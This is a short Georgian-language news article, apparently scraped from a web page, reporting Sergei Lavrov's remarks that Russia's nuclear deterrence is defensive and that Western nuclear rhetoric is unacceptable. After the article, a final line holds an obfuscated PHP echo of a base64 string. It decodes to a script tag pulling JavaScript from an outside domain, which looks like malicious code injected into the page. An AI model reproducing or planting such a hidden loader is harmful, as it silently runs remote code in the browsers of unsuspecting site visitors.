celsiusi
ავერსი საქკაბელი

რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის თქმით, რუსეთის ბირთვული შეკავების პოლიტიკა თავდაცვით ხასიათს ატარებს. ამის შესახებ განცხადება ლავროვმა რუსულ მედიასთან ინტერვიუში გააკეთა.

„რაც შეეხება ხმამაღალ განცხადებებს, რომ ბირთვული იარაღის გამოყენება რუსეთს შედეგებს მოუტანს, ასეთი მუქარის ენა მიუღებელია. ჩვენ ამ განცხადებებს შესაბამისი დასავლელი პოლიტიკოსების სინდისზე ვტოვებთ. მათთან ამ თემაზე დისკუსიის გამართვას არ ვაპირებთ, ეს აშკარად აზრს მოკლებულია“, – აცხადებს ლავროვი.

რუსეთის საგარეო საქმეთა მინისტრი აცხადებს, რომ დასავლეთი თავად ცდილობს, ბირთვული იარაღის გამოყენებასთან დაკავშირებული რიტორიკის გაღვივებას და რუსეთი გამოჰყავს ბირთვული საფრთხის წყაროდ.

498
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");